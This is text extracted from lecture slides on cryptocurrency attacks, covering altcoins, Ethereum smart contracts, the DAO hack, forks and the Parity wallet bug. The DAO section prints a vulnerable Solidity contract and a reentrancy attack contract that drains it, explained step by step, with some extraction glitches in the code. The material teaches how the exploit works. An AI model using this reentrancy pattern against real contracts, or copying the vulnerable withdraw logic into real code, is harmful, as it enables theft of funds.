More Cryptocurrency Attacks - - PowerPoint PPT Presentation

More Cryptocurrency Attacks

http://blockchain.unica.it/projects/ethereum-survey/index.html http://hackingdistributed.com/2016/06/18/analysis-of-the-dao- exploit/ https://hackernoon.com/what-caused-the-latest-100-million- ethereum-bug-and-a-detection-tool-for-similar- bugs-7b80f8ab7279

Last Class

• Majority attacks
• Block withholding attacks
• Spam attacks
• Sybil attacks
• Blacklisting
• Fungibility
• Money laundering

Last Class

• With the rise of 51% attacks:
• why? to what end?
• when will this stop?
• What are the points of centralization in this

network?

• Is this inevitable?

Cryptocurrencies

• First altcoin: Bitcoin testnet
• Second altcoin: Namecoin (DNS system)
• …
• over two thousand altcoins/tokens/etc.

But… why?

• Improvements to Bitcoin
• Alternatives to Bitcoin
• Other functionality complementary to Bitcoin
• Make money for founders

But… how?

• Altcoins: have their own blockchain
• Tokens: built on top of cryptocurrencies

Alternative Proof of Work Mechanisms

• Litecoin: scrypt
• Cuckoo Cycle
• etc.

Alternative functionality

• NameCoin: DNS system
• Ethereum: Turing complete
• ZCash/Monero/others: “Private”

Namecoin

• “completes” Zooko’s Triangle
• Blockchain-based DNS
• First fork of Bitcoin
• Merge mined with Bitcoin:
• same hash function

Ethereum

• Currently the second most popular cryptocurrency
• First proposed as a system built on top of Bitcoin
• Started to create turing-complete money contracts

“smart contracts”

• Ether: currency which is input/output to contracts
• Gas: execution cost of instructions

Smart Contracts

• Run on blockchain and executed by all nodes
• Created by posting a transaction
• Identified by address
• Can hold, receive, and send money
• Once deployed, cannot be changed

Ethereum uses

• DApps
• Distributed applications
• CryptoKitties!
• Ponzi schemes!
• Tokens
• https://coinmarketcap.com/tokens/views/all/

The DAO

• Crowdfunding platform
• Envisioned as a leaderless organization
• Anybody could hold DAO tokens
• DAO creators together agreed on rules
• Raised 12.7M Ether ($150M)

Simplified DAO

• Solidity:
• high-level programming language to write smart

contracts with

• python-ish
• Enter contract: donate
• Exit contract: withdraw
• Fallback option:

Simplified DAO

contract SimpleDAO {
 mapping (address => uint) public credit;
 function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; } function withdraw(uint amount) {
 if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }}}

Attack

contract Mallory {
 SimpleDAO public dao = SimpleDAO(0x354...);
 address owner;
 function Mallory(){owner = msg.sender; }
 function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){

• wner.send(this.balance);

}

Attack

Step 1: Attacker donates ether for Mallory.

contract SimpleDAO {
 mapping (address => uint) public credit;
 function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; }

Attack

contract Mallory {
 SimpleDAO public dao = SimpleDAO(0x354...);
 address owner;
 function Mallory(){owner = msg.sender; }
 function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){

• wner.send(this.balance);

}

Step 1: Attacker donates ether for Mallory. This triggers Mallory’s fallback.

Attack

Step 2: Mallory’s fallback calls the withdraw function.

function withdraw(uint amount) {
 if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }

Attack

Step 3: The withdraw function then invokes Mallory’s default again via call.

function withdraw(uint amount) {
 if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }

Attack

contract Mallory {
 SimpleDAO public dao = SimpleDAO(0x354...);
 address owner;
 function Mallory(){owner = msg.sender; }
 function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){

• wner.send(this.balance);

}

Step 4: We then attempt to withdraw again. The last call to withdraw was interrupted before it could update the credit field, so we still have ether to withdraw!

Attack

• We can repeat ad nauseam until:
• contract gas is exhausted OR
• balance of DAO is zero.

But wait!

7 days before drain started

But wait!

5 days before drain started

But wait!

• Code was attacked after it was patched.
• But how can that be?
• Remember: once deployed, cannot change

Ethereum Price Shock

Forks

• Fork: update in software
• Hard Fork
• requires software update; old version

incompatible

• Soft Fork
• old version compatible with new software

Forks

29

What to do next with Ethereum?

• Nothing
• Gas limit
• Ban spam addresses
• Soft Fork
• Hard Fork

What happened next

https://www.ofnumbers.com/2016/07/28/ethereum-core-and- ethereum-classic-for-dummies/

Parity Multisig

• Ethereum Wallet
• One person “killing” a wallet killed every wallet that

relied on the contract

Questions

• If we can’t secure code in a normal case, how will

we be able to secure it on a blockchain?

• Do new blockchains create decentralization or

centralization pressures? how?